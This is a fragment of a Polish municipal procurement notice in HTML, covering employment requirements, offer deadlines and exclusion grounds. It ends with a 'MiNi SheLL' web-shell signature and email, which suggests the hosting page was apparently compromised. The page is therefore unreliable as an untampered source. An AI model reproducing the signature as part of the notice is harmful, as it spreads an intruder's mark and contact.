aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zbaszynek.logintrade.net/zapytania_email,92324,2cbfdfdebe47ffe6a5419ce1b0af519a.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający przewiduje przesłanki wykluczenia z postępowania na podstawie art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r.<br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego

Creat By MiNi SheLL
Email: jattceo@gmail.com